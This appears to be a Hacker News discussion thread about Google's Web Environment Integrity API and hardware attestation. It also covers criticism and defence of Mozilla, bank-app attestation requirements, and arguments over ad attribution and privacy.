1. The attacker manufactures a device, such as a smartphone, generates a keypair for it, stores it on an HSM on the device (generally called a "trusted enclave"), and signs the public key of the keypair with a master key

2. The device runs the attacker's software and is designed so that whenever non-attacker software is run with elevated privileges, the HSM is informed of that fact in a way that can't be reset without rebooting (and starting again with the attacker's software). For instance, the device might use a verified boot scheme, send the key the OS is signed with to the HSM in a way that is unchangeable until reboot, and it might employ hardening like having the CPU encrypt RAM or apply an HMAC to RAM

3. The HSM produces signatures of messages that contain statements that the device is running the attacker's software, plus whatever the attacker's software wants to communicate and it won't produce them if it's running software of the user's choice as opposed to the attacker's software as established above. It also includes the signature of its public key with the master keypair, allowing accomplices to check that the device is indeed not under the user's control, but rather under the control of someone they trust to effectively limit the user's freedom

4. Optionally, that attestation is passed through the attacker's servers, which check it and return another attestation signed by themselves, allowing to anonymize the device and apply arbitrary other criteria

5. Conniving third parties can thus use this scheme to ensure that they are interacting with a device running the attacker's software, and thus that the device is restricting the user behavior as the attacker specifies. For instance, it can ensure that the device is running the accomplice's code unmodified, preventing the user from being able to run software of their choice, and it can ensure that the user is using device as desired by the attacker and their accomplices.

This attack is already running against Android smartphone users (orchestrated by Google, in the form of SafetyNet and the Play Integrity API) and iOS smartphone users (orchestrated by Apple) and this extends the attack to the web.

This Web Integrity API is just a means to cement themselves as obligatory man in the middle, as opposed to an optional one.

I'm not a tinfoil hat, but security can't hang it's hat on the kindness of strangers.

Given that SSO is a massive security win and has been a game changer for removing passwords, I think it's been shown that delegation is extremely effective.

1. Instead of needing 100 passwords, which increases the chance of users just choosing something and repeating it, you have 1 password.

2. Similarly, instead of needing 2FA on 100 sites they can just have 2FA on their SSO. In fact, the other sites don't even need to support 2FA - you get that "for free" with SSO.

3. SSO providers implement auth really well. They make it smooth, as in "I don't have to reauth when it's obviously me" and safe, as in "that might not be a valid auth, let's get them to 2fa again".

Of course, if you have a password manager then (1) is not a problem. But SSO is a lot simpler for users.

a) SSO has no financial cost. Hardware keys do.

b) SSO has been implemented and standard for years and is trivial for sites to support, hardware keys are much newer and are still rarely supported for authentication.

c) You can use hardware keys with SSO, which I'd recommend, and now you've gotten the benefits of both.

[0] https://us.boell.org/en/2019/10/17/web-partner-companies-kee...

[1] https://tvpworld.com/40781592/another-letter-from-us-ambassa...

Highly abstract risks just dont seem to register for most people. It was hard enough to get the masses to act in self interest over an existential risk to their health (covid).

I reckon the way to avoid maximum damage from this proposal will be some sort of inoculation - e.g. safe, trusted, easy to use tools that help people work around it. The political angle of attack is worth trying but I think it will fail.

I wish Mozilla worked that angle too - e.g. supporting lineage and microg.

And this "attacker" gets... what? Nothing. Because this isn't an attacker... it's a device manufacturer. You've described how attestation works except you've described the TPM as an attacker, which is silly.

They sell the attack to business partners like Netflix and Spotify.

Effectively, they are selling the end users' liberty (ability to run arbitrary software, including for example, a cracked ad-free version of the Spotify app) to those business partners.

In sales-speak, this is framed as "effective Digital Rights Management", with "Rights" meaning "copyright enforcement". Critically, DRM is not a viable methodology until you provide it this attack surface.

It's also worth noting that YouTube is one of those business partners, and both Android and YouTube are owned by the same corporation: Alphabet.

Relative to their current position of already owning the hardware?

> They sell the attack to business partners like Netflix and Spotify.

I don't see how they're "selling" anything. Web Integrity requires no money to change hands. If implemented, Netflix + Spotify would owe Google nothing.

DRM is the tool that guarantees money will change hands. Without it, there is nothing but a social (legal) threat to prevent people copying and distributing copyrighted content for free.

Forcing users to run the DRM-infected version of an app creates an incentive for Netflix and Spotify to participate on the Android platform; which in turn strengthens Android's position, and the Google Play Store as a market.

This incentive goes both ways for YouTube, because it is owned by Alphabet.

> If implemented, Netflix + Spotify would owe Google nothing.

Yes, but that's not the point. Google wants Netflix and Spotify to have Android apps. Netflix and Spotify want DRM infecting their apps. Without this system in place, users can disinfect the Spotify app, and listen to music without paying Spotify money (or watching ads to pay them indirectly).

Without providing the environment for functional DRM, Netflix and Spotify can simply refuse to make Android apps. That would be a pretty weak threat, except that YouTube wants the same thing; and that incentivizes Android to play ball.

Those apps already exist. Don't you think that kind of undermines your entire point?

It's just that this description is describing an "attack" that is just how attestation works. If you have a problem with attestation, talk about that problem, calling it "an attack" does nothing.

I'm actually against the proposal, too - although I see the merits. The ability to have servers authenticate clients based on the context of that client is amazing - it would seriously improve security if done right. But I personally believe that this should be done through the Device Policy extension exclusively, as it is already done there today, and that the extension should be opened and standardized.

In fact, I believe Google should be forced to do so.

It sure is not. But I do believe we should have a legal right to own our own hardware, in every sense.

6. Any additional party with sufficient ability to modify hardware can still attack the attacker and their accomplices. So such parties only benefit from this, at the cost of typical users.

* I can actually run Google Pay because the original SafetyNet API was software backed. So I can spoof a signature from an old device that didn't support hardware attestation. In particular my Pixel 4a claims to be a Nexus 5 so that Google's servers don't expect a hardware signature. But I'm sure that the clock is ticking until these apps (or Google globally) stop considering software backed validation acceptable. I'm quite sure that this Web Integrity API will be hardware backed from the start.

I remember in the long, long ago, when I actually visited a BUILDING to do some of my banking tasks. And when I bought physical media that took up actual 3D space in my house to watch movies. I suspect we aren't incapable of going back.

We don't have to be OK with it, but it seems inevitable that everything is just going to shit. Starting with smartphones. That's why my current smartphone will be my last one. The cost/benefit of them is no longer favorable.

I think that the web itself will be the next casualty.

Yes, in terms of buildings. But I see as many RedBox kiosks around as ever.

I haven't seen anything yet on whether Brave will support it, though if I'm understanding correctly, they won't have a choice since they're using Chromium. Hopefully I'm misinformed.

Ultimately I think we must permanently return to browser ballots back by the law, like the IE bundling fallout. Otherwise friction and incentives will continue to entrench one dominant player.

When a shirt is white and clean, the smallest stain stands out.

Mozilla is one of the rare companies with a mostly white clean shirt.

It is been judged harshly, while we should rejoice that they have been doing amazing things for 20 years despite the competition being terrible people playing dirty.

If we keep doing this, they will be no more Mozilla in the world. Who wants to be the good guys if you are held up against impossible standards when your competitors are paid handsomely to destroy the world?

I know some groups that target perfect ethics: they do nothing, because it's impossible to do anything without screwing up sometimes.

We're not holding Mozilla to higher standards than Google - we just have already discarded Google as an option.

Not collecting telemetry that many users have explicitly stated they do not want and even turned off at every opportunity is not a particularly high standard. Not wanting advertisements integrated into the web browser is not a particularly high standard. Criticizing that the CEO salary has been increasing to absurd levels while the browser has been declining and regular engineers are facing is not holding them to a particlarly high standard. Not wanting the last remaining competitive free web browser run as a commercial project rather than a non-profit foundation is not a high standard. Mozilla chooses to be shittier and shittier. Inaction would be better.

There's some nuance there, too.

It's "turned beige", in part, because people refused to use it while it was still "white". Mozilla has had to make the tough calculation of whether to be pure with zero users and therefore zero good impact, or to be beige to try to get some of these fickle users back and maybe have SOME good impact.

So, basically, people aren't satisfied when Mozilla is pure/idealist, and they aren't satisfied when it's compromising/pragmatic ("If they do that, I might as well keep using Chrome!").

I'm not letting Mozilla off the hook, or giving my blessing for every single decision that's been made. But, there's probably some utility to us taking the view of "just shut up and use Firefox" for the next N years.

I can't really recall any decisions made that were unpopular with existing users, but likely to lure new users in. Ads on new tabs doesn't seem like something that would bring new users in. Pocket doesn't either, since iirc you could install the extension in Chrome if you really wanted it.

Most of the controversies I remember were either to increase Mozilla's revenue, or boondoggles like their mobile OS. My major annoyance was that the increase in revenue seems like it was spent on boondoggles or weird, unrelated charity rather than going back into improving the browser.

I'm still also a Firefox user, but it's like 99% because ads are not their primary source of revenue rather than any remaining fondness towards Mozilla.

But, also, bringing money in is proxy enough for being able to do "good" for whatever definition we'd like to use. So, money or users, I think my general point about compromising their ideals for pragmatism is still valid (not necessarily true or correct, but it's an argument that can potentially be made).

I suspect those are mostly different groups. And my personal take is that Mozilla did indeed make that calculation... and proceeded to sacrifice the die-hard core userbase in order to get wider appeal, but they managed to not actually get the wider audience to buy in either, leaving them with nothing.

Has there ever been a case of an underdog company/product actually gaining market share by becoming less different than the market leader? It always seems like a mistake from the outside, to me. I feel like an underdog is more likely to succeed by actually being different and attracting people who would prefer those differences. Why would anyone change from what they're currently using to an alternative that is almost exactly the same?

https://en.wikipedia.org/wiki/Criticism_of_Mother_Teresa

No. Not even close.

> while we should rejoice that they have been doing amazing things for 20 years despite the competition being terrible people playing dirty.

I reject the "other"-ness in this comment. I was a Mozillian. I was helping do those things. The notion that I should heap accolades upon a bunch of folks who are only now affiliated with Mozilla and who were not contributing during the era in which Mozilla was doing the great things actually deserving of the goodwill associated with its name? And who have themselves been positively poor torchbearers for that name? Condescending.

2023 is the project's 25th birthday. It did amazing things for about 15 of them—by which I mean the people who made up the project. "Mozilla" is merely a legal fiction.

<https://news.ycombinator.com/item?id=23117242>

There's no reason your question couldn't have been posted in a relevant (sub)thread, instead of here, where it's (i) not on topic for the current subject, but (ii) looks like it could be, and therefore (iii) has the same effect as moving the goalposts.

I stick to Safari and Firefox. They're not perfect but they're the only modern browsers that don't use Blink, which is what gives Google the power to make moves like this.

So many people recommend it, but I've been iffy on using brave. Thanks for giving me a little insight on your choices and reasoning behind it.

         |--------------------|
    anti-user              pro-user

         |----G-------M-------|
    anti-user              pro-user

The sentiment I seem to see is that anything short of perfect is failure.

Pocket, cliq, Push Notifications for Mozilla Blog without user consent, Mr robot, Firefox Suggest etc they are littered with mistakes and scandals and have never improved their governance or process.

I can give them a pass on technical decisions like Thunderbird or breaking extensions but when it's purely commercial it has to be judged differently.

It's also about the loss of trust.

That particular incident, for example, was completely unnecessary. It involved a significant display of unbelievably poor judgment, and a total lack of foresight. It shouldn't have happened.

The fact that it did happen, despite it being such an obviously bad idea, raised a lot of questions and doubt.

It causes people to wonder what other incidents, which could potentially be far worse, might happen in the future.

It's remembered years later because it involved such a major loss of trust for so many people.

All valid concerns, but why post about them on the internet? Especially when it's nothing concrete--you used the words "questions", "doubts", and "might happen"? If someone is taking the effort to post FUD (literally) about Mozilla and "trust", why the hell aren't they using that same effort to post about Google or Microsoft and "trust"? Aren't those obviously much bigger problems?

Again, it's not wrong, per se, but I feel like it's bordering on some kind of astroturfing for people to complain about the fucking Mr. Robot non-story that happened years ago when TFA is about Mozilla at least signalling the right thing while Google is trying to be overtly evil YET AGAIN. I can actually type "Fuck Google" faster than I can type "Mr. Robot", so I'd have to have some kind of weird agenda or priorities to bring up Firefox's Mr. Robot thing.

I don't think that there's "a strong anti-Mozilla bias" here, as you put it earlier. The people affected by that incident, and by others, were probably among the most ardent Firefox supporters. After all, they were still using it long after so many others had already moved to Chrome.

Loss of trust is something that isn't easily forgotten, and it's a relevant factor worthy of bringing up in discussion.

It's a non-story because you had to opt-in to Firefox's "experiments" feature to get the extension pushed to you. Opting in to the experiments feature is *literally* granting permission for Mozilla to change the behavior of your Firefox browser remotely in between official releases. So, Mozilla had your permission to change your browser. I simply will not shed a tear for anyone who felt betrayed by something they signed up for.

And, by the way, I was also "affected" by the Mr. Robot thing because I also opted in to the experiments feature.

Furthermore, the extension did nothing harmful. It didn't even collect any data as far as I know. You know why Mozilla pushed an extension that didn't even collect any data instead of one that does? Because they were acting in a trustworthy way!

Sure, it was a faux pax. Mozilla thought they could be cute the same way a lot of old school FLOSSy, hackery, software would include amusing Easter eggs and jokes. It was inappropriate and didn't land well for a variety of reasons, but there was no reason to lose trust in Mozilla at the time, and there's *certainly* no reason to even bring it up today, years later, when just about every other tech company and computer product is trying their damnedest to spy on you, sell your data, prevent you from having root control of your devices, and squeeze subscription money out of you.

Again, Chrome starts tracking you the instant you launch it for the first time. Microsoft tracks you when you log in to Windows and occasionally re-enables tracking features that you've disabled. Mozilla pushed a silly "fun" extension to users who opted in that didn't collect any data nor make Mozilla any money.

This discussion is nonsense. If you truly don't trust Mozilla after the harmless Mr. Robot extension was pushed to you after you chose to allow them to modify your browser remotely, then go ahead and stop using Firefox- I don't care. But please stop spreading FUD.

It's remembered now only by a very small, though vocal, minority.

There is no perfect option right now, and Mozilla will never be that perfect option because they are human and at least three people working there probably want to make some money.

So yeah, lets just keep making them irrelevant so in ten years I won't have a choice and be FORCED to use the browser that says ad blocking is stealing and spoofing your user agent is a violation of the CFAA and all this other blatantly user hostile shit.

It's such clear whataboutism, to have ANYTHING to hold against the only web browser that isn't actively controlled by the people with billions of dollars a year incentive to actually harm how you use the web.

"Firefox displayed a pop-up ad for Mozilla VPN over an unrelated page" (https://news.ycombinator.com/item?id=36077360)

"Mozilla stops Firefox fullscreen VPN ads after user outrage" (https://news.ycombinator.com/item?id=36085642)

That's another incident that just shouldn't have ever happened to begin with, in my opinion.

It's the lack of foresight and the lack of good judgment that I don't see getting fixed.

Both of those incidents should have been completely avoidable with even the most minimal of forethought.

Which is the scale of Mozilla "badness" compared to the rest, even you.

And especially in the ligh of the good things they do.

You can be a critic, but be so in balance with the good things, otherwise you are making doing good something so ingrate a lot of people will give up.

If you thing doing the right thing is easy, you have not been doing a lot of it.

Seems like a good record to me.

Is there any threshold for mendacity that if crossed would bother you?

I mean, Chrome (including Chromium, IIRC) literally collects and ships a bunch of tracking data to Google THE FIRST FUCKING TIME YOU LAUNCH THE APPLICATION.

Context matters. If Firefox did the Pocket nonsense in an environment where we had multiple decent free (as in freedom) browsers, then I'd grab my pitchfork. As it stands, I just can't feel the righteous indignation your comment is trying to rouse. It's truly NOTHING compared to the other options.

They killed Weave (aka Sync 1.0; which was somewhat weird but simple enough to comprehend, reimplement and self-host), replacing it with an NIH-reeking over-engineered abomination that's the very antithesis of standard, open or public. Most people just ignored it as "that's Mozilla own infrastructure, they don't have to make it open, design it well, think of others, or anything else". I could not.

They tried to push a fundamentally flawed Persona/BrowserID standard that continued the trend to remove users from their "own" identities while claiming it's a pro-user pro-privacy move. I can see the logic, but I'm of firm opinion that it would've done more harm than good. I'm glad the project died without gaining any traction and WebAuthn (which has its issues, but where users are the source of their identities) took over. That's what BrowserID should've been, but Mozilla just went with the flow and refused or failed to fight for identity ownership.

It's things like those what made me regret using Firefox (but again, everything else is worse), not some home page sponsored links. That's where they stopped to differ from the rest for me. Mozilla used to be a beacon of doing things right even if it was challenging, fighting for a better web. And they became just another software company, that put their glorious past on all the ads (how they're so pro-everything good) while failing to live up to those high standards.

They had an user agent, but they butchered it and made it just a browser.

Problem is that Chrome is massive. If Chrome decides it will go left, most of websites will go left.

If you want to compare with Google the list is way more subjective.

Firefox's usage dropping from about 30% down to likely less than 3% today, with almost no mobile usage, should be seen as a severe failure.

This failure isn't just about the product's uptake, too. It's also about the Firefox developers losing meaningful influence over the way the web evolves.

         |------------B---A---|
    anti-user              pro-user

---

These kinds of discussions are frustrating to me since it feels like we've been dealt a very bad hand. But it's not just this hand, the dealer is firmly set on us only receiving bad hands in any game we play.

Like in a card game, this is the only hand that we'll get. What other corporation do we have to push these kinds of values? What other avenue do we have? It's sad that we've come to this situation, but if the choice is the currently perceived-to-be-failing Mozilla and no Mozilla, I pick the failing Mozilla.

The thing is, Mozilla shouldn't even be a for-profit corporation in the first place.

         |--------------------|
    anti-user              pro-user

         |----H-------P-------|
    anti-user              pro-user

The sentiment I seem to see is that anything short of sainthood is evil.

The answer of course is that relativism is not a good way to judge people or organizations. Mozilla chooses to do a lot of shitty things. They should be criticized for that even if someone else is worse.

They get hate only for bad or useless things (like the famous "independent voices") but a lot of love for the actual work being done, especially Firefox Containers, enormous performance improvements etc. I'm using Firefox on a daily basis and just the Containers feature make it so much superior to Chrome.

Mozilla, the browser, is great.

Mozilla efforts, such as Rust, have been historically great.

Mozilla leadership is currently awful. They focus is on the wrong things - web VR and low-quality foundational AI models. Maybe because they think the web is at risk of disappearing outright. But the true enemy is Google, and they're currently its well-behaved prisoner.

Mozilla can't bite the hand that feeds it, but someone needs to point the FTC, Congress, and the EU at Google. Everything they do, buy, and work on is to point an overwhelming majority of internet users at its ad products. Chrome, Search, Android, YouTube, Apple default search engine deal, etc. Google has become inescapable. And that's rather anti-competitive if you're trying to advertise your business or selling ad tech.

Nevermind that the web commons and standards are constantly in Google's blast radius for funneling everyone into their gaping maw.

Microsoft and Apple dont have a good history so assuming there is something big here?

1. Under her leadership Mozilla has lost virtually all of its users. It has been reduced to less than 10% of what it had before, maybe worse - I haven't kept up.

2. At the beginning of Covid, a time when remote work was on the rise and tech valuations were through the roof, a time when the browser was more important than ever, she took her largest payout and fired hundreds of employees. She was compensated at over $5M dollars, enough money to pay a team of engineers for years.

3. Firefox has utterly failed to capture Enterprise market, where Chrome has managed to dominate. I doubt most people are even aware that a corp managed Firefox is an option, they have done such a poor job marketing it.

4. Every initiative Mozilla has come out with has completely failed to gain traction. Something like a VPN could have been a great fit for Mozilla but they did nothing with it. Mozilla has been incapable, organizationally, of capitalizing on technology - the thing they're kinda supposed to do exclusively.

She has failed in every conceivable way as a CEO. She has failed in terms of the mission, she has failed her employees, she has failed her users, she has failed to be an example as a leader.

Mozilla, as it exists today, is a convenient project for Chrome to point to and say "look, there's competition" - perhaps the only reason why Google continues to fund Mozilla.

Microsoft and Apple are at least competently run and have incentives to push to reduce Chrome's power.

Of course, there's also criticism for attempting those.

If I could/had to pay/donate for it - I'd gladly do, but it's virtually impossible.

That said, I think income from Firefox's default search engine pretty much dwarfs any income that could potentially be gained from donations/buy-to-support.

From what I understand, the arguments about self-preferencing kind of always get thrown out due to a more strict interpretation of the law. Did with Apple, and with Facebook when they were acquiring Instagram and Whatsapp.

It feels weird that I'm now grateful for how crap they are.

For example it is currently the reality in EU, that in order to use any of the native banking apps, a user has no choice but to expose themselves to privacy violations by either Google or Apple, i.e. US companies.

While at least one alternative exists, https://grapheneos.org/articles/attestation-compatibility-gu..., these alternatives are not being used in practice.

I see no way of preventing this happening on the web as well, if the Web Environment Integrity API ships.

1. From what I've seen, the PSD2 APIs haven't really been created with end users in mind – there are non-trivial accreditation requirements on people/entities wishing to make use of those APIs, the expectation being that only professional middlemen will dally with those APIs.

2. The PSD2 APIs don't necessarily cover the full functionality of a bank's online banking functionality.

3. While you can probably still get quite far with "just" the ability to query the current account data and recent transactions, as well as being able to initiate payments, this doesn't sidestep the bank's authorisation requirements – meaning that unless you can use a hardware TAN generator or something like that, you're still dependent on the bank's app for payment and account access authorisation.

Maybe web is the right platform for these. But of course Google will use this to close things down.

The average person is very likely to have malware on their computer, but not on their phone.

I installed lineageOS, which is passes the Google SafetyNet check out-of-the-box. So most things just work, including my local Credit Union's app.

But lineageOS fails the CTS profile check on my phone. Fidelity checks this after you log in and shows a "For security reasons your account has been blocked..." message.

So I had to root the phone to install a CTS profile fixer, and then more hacks to hide the fact it was rooted.

After that Fidelity worked, but requested root permission every time I launched it until I figured out how to permanently disable that.

Netflix was similar, but not quite as annoying.

Is that sarcasm? Their computer is likely more secure than the jungle of manufacturer modified roms where who knows what's inside.

Because their customers aren't security nerds that have smartphones with authentication apps.

They want people that barely get smartphones, or still use feature phones, to be able to access their services with some improved security workflows.

I got codes via SMS when I installed those apps and I had to prove that I owned the phone number I was associating with the app.

IMO much bigger issue is that significant amount of non-banking sites that are now trying to shame user with "disable adblocker to continue" messages (easily bypassed) will start requiring this. Or Twitter/Reddit/etc., in the name of "fighting bots" of course, nothing to do with ensuring you are watching their ads...

The solution is diversity and using browsers that respect users. Chrome only has the power to push this API because they own most of the market.

Every financial i use (half a dozen) have an app

Unless you have billions at a bank, I don't see why any bank would even consider changing how their website works because of a single customer. And, well, real billionaires probably don't care about not being able to use a website on Firefox.

My bank calls me once every few months, if everything is ok, and if there are is something that is bothering me and could be improved, or if they can help with something. At first I thought it is some marketing program and some manager has to achieve some KPIs, but surprisingly, they did listen to suggestions (it took time, but they eventually did).

So you never know, if you never try.

Business account is in different bank, and the communication there was much harder (obviously by someone not trained in communication and having to talk to me as unplanned part of their job). The fees are lower, though.

So it doesn't seem to be by the amount of $$$ on the account.

Note that "safety and security" has become an abhorrent phrase among many of us because it evokes the "authoritarian dystopia" that Google et.al. are creating --- we're more concerned about freedom and interoperability.

That was the intention behind my choice of words — representing the whole web, not just components of it or companies operating on it.

Thats what we do, anyways.

Assuming this gets implemented, users might start being unable to access certain websites or services because their identity is deemed "insufficient", which would move them to use a different browser that does not have this.

I don't see why it would be that difficult. The issue here is with websites that want to mandate it.

Not saying it's perfect or better, just that we need it. we need a competing browser with a rendering engine that google doesn't ultimately control that has a non-trivial market share. Otherwise we may as well just stop complaining and let google do what it wants because we'll have no power to stop them anyway.

Quick googling confirms 50%+ of revenue came from Google 5-10 years ago, but couldn't find more recent data.

If Google is Mozilla's primary revenue source (especially if it's the majority), then Google effectively controls Mozilla via the leverage it has to pull Mozilla's largest revenue source.

Edit: Also raises the question, what company or organization should be developing browsers? A browser is something everyone expects to be free, but a browser is by no means free to develop, operate and maintain. For-profit browser companies (like Brave) would be forced to monetize the browser (like Brave tried to do with BAT crypto tokens, ads on the new tab page, etc)

There's been speculation for a long time that the real reason Google pays for that is to keep Mozilla afloat and stave off antitrust investigations related to Chrome.

That may have changed with other browsers coming out, although almost all of them are based on Chromium. Ianal, have no idea whether or not someone can be a "competitor" if they're using largely the same source.

If it's true that Google is mostly paying for antitrust avoidance and that something like Edge isn't a "competitor", Mozilla has substantial leverage. Mozilla just needs to be cheaper than an antitrust investigation and potential loss of that case. I would imagine that's not hard to do, that sounds expensive.

Mozilla has opposed Google many times, and is doing so again in the very link you are commenting on. Mozilla is not completely free from economic realities, but we are definitely not controlled by Google.

(Disclaimer: I'm working for Mozilla as an SRE.)

If you are shown a product ad whilst browsing searchengine.example and then later look up the product at reviews.example, then end up making a purchase at shop.example, your Mozilla browser will send all of these events to one or more aggregation services that allows shop.example to understand (at least in aggregate, assuming you trust the cartels running the aggregation services) that you were exposed to their product at searchengine.example and further exposed to their product at reviews.example.

Where previously an ad tech company was ultimately able to track users based on source IP address (even if cookies had been disabled by a user), IPA now allows these companies to track users across multiple IP addresses, and regardless of the user's cookie settings, via a unique tracking identifier. It is also proposed that the operating system provides the unique tracking identifier which can then be used by all applications or browsers on a device, allowing different devices behind a single IP address to be distinguished.

[1] https://github.com/patcg-individual-drafts/ipa/

Most of these private attribution systems are specifically designed so that the people running the ad can count how many people clicked their ads, but not who clicked them or what other things they did. Safari had a proposal in which you could only have a certain number of campaigns running per domain, so you couldn't set up a separate """campaign""" for each user and fingerprint them all at once. I don't know how the Mozilla proposal differs.

Whether or not user-agents should care about this sort of thing is an orthogonal question.

[0] https://www.theregister.com/2023/06/29/google_trueview_skept...

[1] Remarketing in particular is responsible for the "feeling of being seen" from modern ads where you search for one thing and get 10,000 ads for the thing for the next week

Something strange. So, radio advertisement, billboards, video panels, and absolutely any other type of advertisement is a scam that exists for few decades and still going good?

This is quite different than the current design of online ads, where which ad to show is only decided when the ad loads and reloads.

Not that it matters that much - online ads are a total scam anyway. Particularly google's search ads, which 9 times out of 10 is just a copy of the first search result - but now in a version where they get money for the click.

I do recall it being common for internet ads to be sold directly like billboards back in the day, before the action model took over, especially for higher value sites that could be likened to the prime real estate of a billboard on a city square or key highway with their guaranteed literal traffic.

But such direct deals probably didn't scale well, and definitely left smaller sites wanting to earn some extra revenue in the dust. There was a time when ads weren't as shit as they are now - most wouldn't worry about a banner ad or two on their favorite forum.

I agree that it convenient to be able to see each ad information, but that doesn't mean that it should be this way.

When buying internet ad space, though, the information asymmetry is vastly different.

User Agent. Not advertiser agent, not government agent. USER AGENT!

No, attribution is what advertisers want, to do the least amount of work possible to blast you with ads that attack your deepest weaknesses, all under the pretense of "personalization".

> then the ad platform will defraud you[0]

Cool. How is that my problem as a user ? Grow a set of balls and sue the ad platform.

It is however what the advertisement companies and agencies want. They are selling shitty products.

They don't give a single shit about my happiness, as long as I buy their product. Whether that's through a happy ad that made me laugh, or through being blasted with it every day for a year so that their brand is the only one I think of when I need to buy X.

Companies do not see you as a person. They don't even lack empathy, they didn't have any to begin with. You're a walking wallet they have to empty, by any means necessary, and if that's through making you feel that you're ugly and you should buy their new skincare, they will.

The majority of companies are small to medium businesses that do actually care about their customers - when your customers are measured in thousands or less instead of billions, you will go belly up if you don't. They still use ads because how the heck would you otherwise know they even existed, and yes they want you to buy stuff but they hope you actually like the product afterwards so you end up helping them get known.

Think of it a bit like when your favorite tiny, niche YouTube channel uses clickbaity titles and thumbnails, or target the 10-15 minute mark, or use the same intro/outro format and duration as everyone else. If they didn't, no one would ever see their videos as they'd get deselected by the algorithm. No one will watch a video, or buy a product, that they do not know exists.

If pissing me off after they've gotten $100 out of me means they get three other to spend $100, it's much more valuable than having me as a repeat customer. If someone found a way to triple my monthly spend but it made me miserable, said company would inevitably do it. Because if they don't, someone will come in, and eat them alive.

Advertising is purposefully inflicted misery, on all of us. The CEO of TF1, a french TV channel, called his job "selling available brain time to advertisers". That is all you are to them, whether we're talking about Coca Cola or Joe's Snoe and Foe: they want your money, because they die without it. Every company is a parasitic organism, and advertising is currently the most efficient way to spread.

Having you spend money on a product you end up liking is positive for both parties of that transaction. Imagine it's a book you like, and you recommend it to others - who then buy it too to read it. Or a song you get others to hear. That's a happy customer of an arbitrary product. Does the author or artist know who you are personally? Of course not, but they didn't need to for them to care about their customers and make something that they enjoyed.

"blast you with ads that attack your deepest weaknesses, all under the pretense of "personalization"."

Instead it will tell advertisers how effective their blast was, and help argue that Google isn't defrauding them.

Okay. So this is about validating ad effectiveness and minimizing ad fraud, right?

Assuming that's your point (apologies if I'm missing something important), what does that have to do with me or my private property?

Advertisers have business relationships with advertising platforms. Advertisers might also have a business relationship with me, assuming I choose to purchase their product(s).

But the advertising platform has no business relationship with me (assuming I'm not buying ads on that platform). As such, why do I have to give data, CPU cycles and privacy so the advertising platform can provide metrics about ad effectiveness and fraud?

None of that has anything to do with me, and I don't wish to give up those things (especially my privacy) on the devices I own.

It's unethical for these rapacious scumbags to limit what I can do on my devices (which are my private property) If I refuse to provide third (the ad platform) and fourth (the advertisers) parties specific information about who I am and what I see or don't see (which is what a permanent identifier in secure storage would do) when I visit a site of my choosing.

I'll say it again to make sure I'm clear: I don't care about advertisers or ad platforms. They can go an play with each other all they want -- but don't limit what I can do on my devices because it will make you more money. Fuck. That. Noise.

Edit: Clarified prose.

Indeed

> what does that have to do with me or my private property? ... But the advertising platform has no business relationship with me

I am not convinced that you owe the advertising platform attribution. My original point was just that attribution is not about dragnet surveillance for personalizing ads. But I can try to argue why browsers should do attribution, just to interrogate the question.

Specifically, you have a business relation with whatever website you are going to that serves you ads. That website has a clear interest in helping their ad-platform attribute ads on their website. After all, that website depends on those ads for your income.

It is then within the perogative of that website to effectively say I only want to serve my website to users who will cooperate with attribution. This request is not a request for mass surveillance, because attribution is limited in what it reveals about a person. So this request could be construed as reasonable.

Given that websites have a reasonable standing to make these demands, it is reasonable for a user-agent to be able to accept these demands. Since otherwise the user for which the user-agent is acting cannot visit the website they requested the user-agent display. Of course a user-agent should let you opt out, but then websites are within their rights of refusing you access.

So far, so reasonable (or at least not completely unreasonable).

The sticking point is of-course that most website do want attribution, but don't want to block people with older browsers. So they want users to agree to give them the attribution data without giving the users anything in return. At which point a user-agent has no more business cooperating with attribution on behalf of the user.

In that case, there remains an argument of "if we don't do attribution the entire web is worse off, so we solve the tragedy of the commons by 'making the right decision' in the defaults for the user-agent". But that argument is clearly unreasonable to me.

Just a nit, "...that website depends on those ads for their income," not mine.

But yes, you're correct. And I do, in fact, aggressively block ads and the trackers/spyware/malware that goes with them.

And website owners are well within their rights to block me from viewing their site if (when, actually) I refuse to view their ads -- a point I've made in perhaps a half-dozen comments here on HN just in the past 12 months or so.

And I'm fine with that. For exactly the same reasons I gave for not wanting anything to do with ads/trackers/spyware running on my private property -- a site is the website owner's private property and they should be able to "charge a cover fee" (i.e., require that I view ads) to view the content of that site.

But WEI doesn't change that dynamic even a little. Rather, it forces me to give up control of my private property and privacy whether I want to do so or not.

I'd add that the "benefit" here isn't giving website owners the option to block me if I don't wish to view the ads run on their site -- they can already do that without WEI. In fact, some sites already do so. The only "benefit" AFAICT is that the ad platforms would now have enormously more information (in that they can now track me everywhere with a cryptographic signature regardless of any steps I might take to protect my privacy) to validate ad impressions and reporting metrics for the advertisers.

The result is that website owners have the same capability they've always had, but now I'm forced to subsidize some of the richest companies in the world with my electricity, CPU cycles, data, network bandwidth, browsing history, and likely my PII.

That's what I object to.

>In that case, there remains an argument of "if we don't do attribution the entire web is worse off, so we solve the tragedy of the commons by 'making the right decision' in the defaults for the user-agent". But that argument is clearly unreasonable to me.

Yes, it is unreasonable. I take great pains (I never log in/create accounts on any Google properties, block trackers and "analytics," self-host my email and content I wish to share in the Internet, etc., etc., etc.) to maintain at least a semblance of privacy, which is already a time/cost sink for me.

And these rapacious scumbags want me to jump through more hoops and run their code on my systems just so they can charge advertisers more for shit I don't want anyway? I'll say it again: Fuck. That. Noise.

tl;dr: Websites can already (and I support their ability to do so) block me (or anyone else) who runs an ad blocker from viewing their site. As such, the only folks that will have new capabiliities/benefits from WEI are ad platforms and advertisers. With whom I have no relationship whatsoever and don't want their spyware to execute on my private property.

Alright, let's see the next senten-

>It's about proving to advertisement customers that their ads were seen and were useful.

So, it's about making sure that the ads that they showed me were personalized enough that they accurately target me. Ads that are built to be efficient because they create a need from a very small part in me that can normally be reasoned with. Or attack some deep seated fears to make me purchase their magic fat loss pills, that they accurately targeted because of attribution, and because of being repeatedly told how effective their blasts are.

So it's about personalization, got it.

The pitch of modern advertising certainly seems to be 'more personalised ads are the only way to be effective'. And within that pitch, attribution is about finding out if the way an ad was personalized was indeed effective. But I am not sure I trust google and facebook when they claim "only personalized ads are effective".

Yes, and since "attribution" as defined here is incompatible with user's privacy (which is a human right), therefore advertising should fail. Can it please fail early and fail often?

What prevents any of the following solutions from providing assurance to advertising clients, without also destroying the Internet and general purpose computing:

1. Building trust with advertising clients be treating them with respect, honesty and transparency. If your clients don't trust your advertising network and were demanding assurances in the form of WEI and similar proposals, surely it's obvious there are bigger problems. The advertising client would likely have dropped the advertising network long ago but can't due to monopolies existing.

2. Advertising networks undergo independent audits (results available to clients) and become more transparent to clients in how their advertising spend is being used.

